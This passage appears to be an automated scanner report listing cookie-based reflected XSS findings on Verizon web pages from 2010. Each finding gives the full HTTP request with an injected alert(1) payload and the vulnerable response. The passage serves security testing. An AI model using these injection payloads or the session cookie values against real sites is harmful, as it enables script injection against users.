The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48553"-alert(1)-"872a1235bd2 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=48553"-alert(1)-"872a1235bd2; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77665
Expires: Sat, 20 Nov 2010 02:53:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:58 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "48553"-alert(1)-"872a1235bd2"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.299. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 721a5<script>alert(1)</script>92d3aad9a2c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX721a5<script>alert(1)</script>92d3aad9a2c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73632
Expires: Sat, 20 Nov 2010 02:53:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX721a5<script>alert(1)</script>92d3aad9a2c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX721A5<SCRIPT>ALERT(1)</SCRIPT>92D3AAD9A2C </DIV>
...[SNIP]...

3.300. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e917'><script>alert(1)</script>680f4f478a3 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5e917'><script>alert(1)</script>680f4f478a3; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 02:53:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX5e917'><script>alert(1)</script>680f4f478a3; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5E917'><SCRIPT>ALERT(1)</SCRIPT>680F4F478A3 ' />
...[SNIP]...

3.301. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c96"-alert(1)-"386419827f6 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=d9c96"-alert(1)-"386419827f6; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77874
Expires: Sat, 20 Nov 2010 02:53:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "d9c96"-alert(1)-"386419827f6"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.302. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /content/verizonglobalhome/gpromo.aspx

Issue detail

The value of the vzapps cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ae0f'-alert(1)-'8c7ffab235 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

